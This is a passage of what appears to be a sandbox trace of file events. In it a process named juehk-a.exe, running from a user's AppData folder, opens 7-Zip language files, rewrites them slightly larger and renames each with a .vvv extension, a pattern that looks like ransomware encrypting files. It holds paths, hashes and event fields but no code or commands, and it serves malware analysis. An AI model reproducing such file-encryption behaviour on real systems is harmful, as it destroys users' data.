- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519744
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 63864
- mode: rename
- sequenceNumber: 818
- filesize: 27214
- md5sum: 7957a2643e018dadec6a3db7114ffdd1
- sha1sum: 0f11e4deb3e56f4ed71fae67e58691324e3a287b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\hi.txt
- new_name: C:\Program Files\7-Zip\Lang\hi.txt.vvv
- ads:
- fid (ads:): 562949953519744
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 63905
- mode: open
- sequenceNumber: 819
- value: C:\Program Files\7-Zip\Lang\hr.txt
- filesize: 13506
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519745
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 64283
- mode: close
- sequenceNumber: 820
- value: C:\Program Files\7-Zip\Lang\hr.txt
- filesize: 13934
- md5sum: 5846bf0b78dfced2e233693e1ef4f5e4
- sha1sum: 61665af3a957fe6b4f7bd2e5037c0dd615ee108c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519745
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64297
- mode: rename
- sequenceNumber: 821
- filesize: 13934
- md5sum: 5846bf0b78dfced2e233693e1ef4f5e4
- sha1sum: 61665af3a957fe6b4f7bd2e5037c0dd615ee108c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\hr.txt
- new_name: C:\Program Files\7-Zip\Lang\hr.txt.vvv
- ads:
- fid (ads:): 562949953519745
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64310
- mode: open
- sequenceNumber: 822
- value: C:\Program Files\7-Zip\Lang\hu.txt
- filesize: 14584
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519746
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 64378
- mode: close
- sequenceNumber: 823
- value: C:\Program Files\7-Zip\Lang\hu.txt
- filesize: 15006
- md5sum: 5d65ae9d8df0d60d18a9f12618b4089a
- sha1sum: 840ad256ba9293198bc2565dde4fcc82a0628962
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519746
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64387
- mode: rename
- sequenceNumber: 824
- filesize: 15006
- md5sum: 5d65ae9d8df0d60d18a9f12618b4089a
- sha1sum: 840ad256ba9293198bc2565dde4fcc82a0628962
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\hu.txt
- new_name: C:\Program Files\7-Zip\Lang\hu.txt.vvv
- ads:
- fid (ads:): 562949953519746
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64392
- mode: open
- sequenceNumber: 825
- value: C:\Program Files\7-Zip\Lang\hy.txt
- filesize: 18716
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519747
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 64399
- mode: close
- sequenceNumber: 826
- value: C:\Program Files\7-Zip\Lang\hy.txt
- filesize: 19134
- md5sum: 2b587579018173be4eb3336b222552a9
- sha1sum: 39c744ffa110edfdc76a2bbc94f8c0311f20d922
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519747
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64407
- mode: rename
- sequenceNumber: 827
- filesize: 19134
- md5sum: 2b587579018173be4eb3336b222552a9
- sha1sum: 39c744ffa110edfdc76a2bbc94f8c0311f20d922
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\hy.txt
- new_name: C:\Program Files\7-Zip\Lang\hy.txt.vvv
- ads:
- fid (ads:): 562949953519747
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64412
- mode: open
- sequenceNumber: 828
- value: C:\Program Files\7-Zip\Lang\id.txt
- filesize: 13337
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519748
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 64678
- mode: close
- sequenceNumber: 829
- value: C:\Program Files\7-Zip\Lang\id.txt
- filesize: 13758
- md5sum: 3f6ed35d1c4454632ccdbef6759e1662
- sha1sum: 518e74b9a9139f5c62dbd90ba218365ceac5ad5c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519748
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64687
- mode: rename
- sequenceNumber: 830
- filesize: 13758
- md5sum: 3f6ed35d1c4454632ccdbef6759e1662
- sha1sum: 518e74b9a9139f5c62dbd90ba218365ceac5ad5c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\id.txt
- new_name: C:\Program Files\7-Zip\Lang\id.txt.vvv
- ads:
- fid (ads:): 562949953519748
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64703
- mode: open
- sequenceNumber: 831
- value: C:\Program Files\7-Zip\Lang\io.txt
- filesize: 10115
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519749
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 64877
- mode: close
- sequenceNumber: 832
- value: C:\Program Files\7-Zip\Lang\io.txt
- filesize: 10542
- md5sum: ad10d1c79439a02d2048f5db59fd9358
- sha1sum: 911c7bc1ee63de6168efbb75369b1fec1cea86aa
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519749
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64890
- mode: rename
- sequenceNumber: 833
- filesize: 10542
- md5sum: ad10d1c79439a02d2048f5db59fd9358
- sha1sum: 911c7bc1ee63de6168efbb75369b1fec1cea86aa
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\io.txt
- new_name: C:\Program Files\7-Zip\Lang\io.txt.vvv
- ads:
- fid (ads:): 562949953519749
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 64976
- mode: open
- sequenceNumber: 834
- value: C:\Program Files\7-Zip\Lang\is.txt
- filesize: 12293
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519750
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65280
- mode: close
- sequenceNumber: 835
- value: C:\Program Files\7-Zip\Lang\is.txt
- filesize: 12718
- md5sum: bf831e31a731fc607fc5daed22e251dc
- sha1sum: 2d8499bb9c6b6d144dfa9c962a48f66c946b18e4
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519750
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65475
- mode: rename
- sequenceNumber: 836
- filesize: 12718
- md5sum: bf831e31a731fc607fc5daed22e251dc
- sha1sum: 2d8499bb9c6b6d144dfa9c962a48f66c946b18e4
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\is.txt
- new_name: C:\Program Files\7-Zip\Lang\is.txt.vvv
- ads:
- fid (ads:): 562949953519750
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65485
- mode: open
- sequenceNumber: 837
- value: C:\Program Files\7-Zip\Lang\it.txt
- filesize: 14153
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519751
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65564
- mode: close
- sequenceNumber: 838
- value: C:\Program Files\7-Zip\Lang\it.txt
- filesize: 14574
- md5sum: 1973e783c402859516f1a916d623b5d4
- sha1sum: 7487b8654f93965ee47dff9ed03935842c1dd8bb
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519751
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65572
- mode: rename
- sequenceNumber: 839
- filesize: 14574
- md5sum: 1973e783c402859516f1a916d623b5d4
- sha1sum: 7487b8654f93965ee47dff9ed03935842c1dd8bb
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\it.txt
- new_name: C:\Program Files\7-Zip\Lang\it.txt.vvv
- ads:
- fid (ads:): 562949953519751
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65580
- mode: open
- sequenceNumber: 840
- value: C:\Program Files\7-Zip\Lang\ja.txt
- filesize: 15953
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519752
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65604
- mode: close
- sequenceNumber: 841
- value: C:\Program Files\7-Zip\Lang\ja.txt
- filesize: 16382
- md5sum: 4ec16c048c79b5c77a0c56cddbead869
- sha1sum: d43e8b6a91e9214f7bcaaeb59c27cf71652dd779
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519752
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65611
- mode: rename
- sequenceNumber: 842
- filesize: 16382
- md5sum: 4ec16c048c79b5c77a0c56cddbead869
- sha1sum: d43e8b6a91e9214f7bcaaeb59c27cf71652dd779
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ja.txt
- new_name: C:\Program Files\7-Zip\Lang\ja.txt.vvv
- ads:
- fid (ads:): 562949953519752
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65616
- mode: open
- sequenceNumber: 843
- value: C:\Program Files\7-Zip\Lang\ka.txt
- filesize: 19733
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519753
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65641
- mode: close
- sequenceNumber: 844
- value: C:\Program Files\7-Zip\Lang\ka.txt
- filesize: 20158
- md5sum: a4c76ee2ce951bef9163649a15279663
- sha1sum: 8073274858b411b97f4e34a32d97cf1ac1ba8613
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519753
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65674
- mode: rename
- sequenceNumber: 845
- filesize: 20158
- md5sum: a4c76ee2ce951bef9163649a15279663
- sha1sum: 8073274858b411b97f4e34a32d97cf1ac1ba8613
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ka.txt
- new_name: C:\Program Files\7-Zip\Lang\ka.txt.vvv
- ads:
- fid (ads:): 562949953519753
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65680
- mode: open
- sequenceNumber: 846
- value: C:\Program Files\7-Zip\Lang\kk.txt
- filesize: 17704
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519754
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65739
- mode: close
- sequenceNumber: 847
- value: C:\Program Files\7-Zip\Lang\kk.txt
- filesize: 18126
- md5sum: 84e010ab4a8b9814ec413ffcae486847
- sha1sum: 08d1f46d7ca9bb2169ce37041fc0a325e228c48b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519754
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65755
- mode: rename
- sequenceNumber: 848
- filesize: 18126
- md5sum: 84e010ab4a8b9814ec413ffcae486847
- sha1sum: 08d1f46d7ca9bb2169ce37041fc0a325e228c48b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\kk.txt
- new_name: C:\Program Files\7-Zip\Lang\kk.txt.vvv
- ads:
- fid (ads:): 562949953519754
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65766
- mode: open
- sequenceNumber: 849
- value: C:\Program Files\7-Zip\Lang\ko.txt
- filesize: 14742
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519755
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65861
- mode: close
- sequenceNumber: 850
- value: C:\Program Files\7-Zip\Lang\ko.txt
- filesize: 15166
- md5sum: d002f665bd7415ce917da6c8470bdf6a
- sha1sum: 69dca8f49edf3911d1a898323bec262aa42023f4
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519755
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65870
- mode: rename
- sequenceNumber: 851
- filesize: 15166
- md5sum: d002f665bd7415ce917da6c8470bdf6a
- sha1sum: 69dca8f49edf3911d1a898323bec262aa42023f4
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ko.txt
- new_name: C:\Program Files\7-Zip\Lang\ko.txt.vvv
- ads:
- fid (ads:): 562949953519755
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65877
- mode: open
- sequenceNumber: 852
- value: C:\Program Files\7-Zip\Lang\ku-ckb.txt
- filesize: 19711
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519757
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65961
- mode: close
- sequenceNumber: 853
- value: C:\Program Files\7-Zip\Lang\ku-ckb.txt
- filesize: 20126
- md5sum: 2f6aa129b6e4a21161e6781c9b651564
- sha1sum: 96154721c98797599e12629d5b0f733f03019883
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519757
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65968
- mode: rename
- sequenceNumber: 854
- filesize: 20126
- md5sum: 2f6aa129b6e4a21161e6781c9b651564
- sha1sum: 96154721c98797599e12629d5b0f733f03019883
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ku-ckb.txt
- new_name: C:\Program Files\7-Zip\Lang\ku-ckb.txt.vvv
- ads:
- fid (ads:): 562949953519757
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65975
- mode: open
- sequenceNumber: 855
- value: C:\Program Files\7-Zip\Lang\ku.txt
- filesize: 11198
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519756
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66032
- mode: close
- sequenceNumber: 856
- value: C:\Program Files\7-Zip\Lang\ku.txt
- filesize: 11614
- md5sum: 37203d855b8ae3c3a838b8b9d87b081e
- sha1sum: 56e33a2c9713dcbd246e7d937ed13152f8152aff
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519756
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66075
- mode: rename
- sequenceNumber: 857
- filesize: 11614
- md5sum: 37203d855b8ae3c3a838b8b9d87b081e
- sha1sum: 56e33a2c9713dcbd246e7d937ed13152f8152aff
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ku.txt
- new_name: C:\Program Files\7-Zip\Lang\ku.txt.vvv
- ads:
- fid (ads:): 562949953519756
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66084
- mode: open
- sequenceNumber: 858
- value: C:\Program Files\7-Zip\Lang\lt.txt
- filesize: 13239
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519758
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66307
- mode: close
- sequenceNumber: 859
- value: C:\Program Files\7-Zip\Lang\lt.txt
- filesize: 13662
- md5sum: 3c96bfae5736bab33faea284c0e9d21c
- sha1sum: 9fd4f816ed2e8034fee9dd2d7e2736df9031c98a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519758
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66389
- mode: rename
- sequenceNumber: 860
- filesize: 13662
- md5sum: 3c96bfae5736bab33faea284c0e9d21c
- sha1sum: 9fd4f816ed2e8034fee9dd2d7e2736df9031c98a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\lt.txt
- new_name: C:\Program Files\7-Zip\Lang\lt.txt.vvv
- ads:
- fid (ads:): 562949953519758
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66420
- mode: open
- sequenceNumber: 861
- value: C:\Program Files\7-Zip\Lang\lv.txt
- filesize: 10690
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519759
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66614
- mode: close
- sequenceNumber: 862
- value: C:\Program Files\7-Zip\Lang\lv.txt
- filesize: 11118
- md5sum: 361c444c91a31ceaf2a36b1156b908b7
- sha1sum: fe536ada65ea429ad7b6679697087cd7cc9b4a2a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519759
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66624
- mode: rename
- sequenceNumber: 863
- filesize: 11118
- md5sum: 361c444c91a31ceaf2a36b1156b908b7
- sha1sum: fe536ada65ea429ad7b6679697087cd7cc9b4a2a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\lv.txt
- new_name: C:\Program Files\7-Zip\Lang\lv.txt.vvv
- ads:
- fid (ads:): 562949953519759
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66632
- mode: open
- sequenceNumber: 864
- value: C:\Program Files\7-Zip\Lang\mk.txt
- filesize: 15080
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519760
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66640
- mode: close
- sequenceNumber: 865
- value: C:\Program Files\7-Zip\Lang\mk.txt
- filesize: 15502
- md5sum: 20fa443b56991b5a36f947c2449bd6fa
- sha1sum: b4182e1ade7dc7d4d314909d294b2ee521bbd8e2
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519760
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66649
- mode: rename
- sequenceNumber: 866
- filesize: 15502
- md5sum: 20fa443b56991b5a36f947c2449bd6fa
- sha1sum: b4182e1ade7dc7d4d314909d294b2ee521bbd8e2
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\mk.txt
- new_name: C:\Program Files\7-Zip\Lang\mk.txt.vvv
- ads:
- fid (ads:): 562949953519760
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66656
- mode: open
- sequenceNumber: 867
- value: C:\Program Files\7-Zip\Lang\mn.txt
- filesize: 14657
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519761
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66777
- mode: close
- sequenceNumber: 868
- value: C:\Program Files\7-Zip\Lang\mn.txt
- filesize: 15086
- md5sum: 1ef19ba217ee21e95f9e6879e46795c5
- sha1sum: a187b01d883bdf68b67ca0396a84e149cea7e821
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519761
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66836
- mode: rename
- sequenceNumber: 869
- filesize: 15086
- md5sum: 1ef19ba217ee21e95f9e6879e46795c5
- sha1sum: a187b01d883bdf68b67ca0396a84e149cea7e821
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\mn.txt
- new_name: C:\Program Files\7-Zip\Lang\mn.txt.vvv
- ads:
- fid (ads:): 562949953519761
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66867
- mode: open
- sequenceNumber: 870
- value: C:\Program Files\7-Zip\Lang\mr.txt
- filesize: 17597
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519762
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67021
- mode: close
- sequenceNumber: 871
- value: C:\Program Files\7-Zip\Lang\mr.txt
- filesize: 18014
- md5sum: 027ee98c5cc370e962d321f909e775e3
- sha1sum: b10b3acd9391841a84f28ae4f6a38e3307c85e3c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519762
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67039
- mode: rename
- sequenceNumber: 872
- filesize: 18014
- md5sum: 027ee98c5cc370e962d321f909e775e3
- sha1sum: b10b3acd9391841a84f28ae4f6a38e3307c85e3c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\mr.txt
- new_name: C:\Program Files\7-Zip\Lang\mr.txt.vvv
- ads:
- fid (ads:): 562949953519762
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67055
- mode: open
- sequenceNumber: 873
- value: C:\Program Files\7-Zip\Lang\ms.txt
- filesize: 10409
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519763
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67067
- mode: close
- sequenceNumber: 874
- value: C:\Program Files\7-Zip\Lang\ms.txt
- filesize: 10830
- md5sum: 8f13333b68ec08ecb97bf863a77129c1
- sha1sum: 08ea30eb9666da62d4eaa67a7dd02b5555b18819
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519763
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67074
- mode: rename
- sequenceNumber: 875
- filesize: 10830
- md5sum: 8f13333b68ec08ecb97bf863a77129c1
- sha1sum: 08ea30eb9666da62d4eaa67a7dd02b5555b18819
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ms.txt
- new_name: C:\Program Files\7-Zip\Lang\ms.txt.vvv
- ads:
- fid (ads:): 562949953519763
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67079
- mode: open
- sequenceNumber: 876
- value: C:\Program Files\7-Zip\Lang\nb.txt
- filesize: 11767
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519766
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67139
- mode: close
- sequenceNumber: 877
- value: C:\Program Files\7-Zip\Lang\nb.txt
- filesize: 12190
- md5sum: d49e1041a64134e5ba5094c39eb038a0
- sha1sum: 9c524670e751263403f0c3bc98057dc6a64e263b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
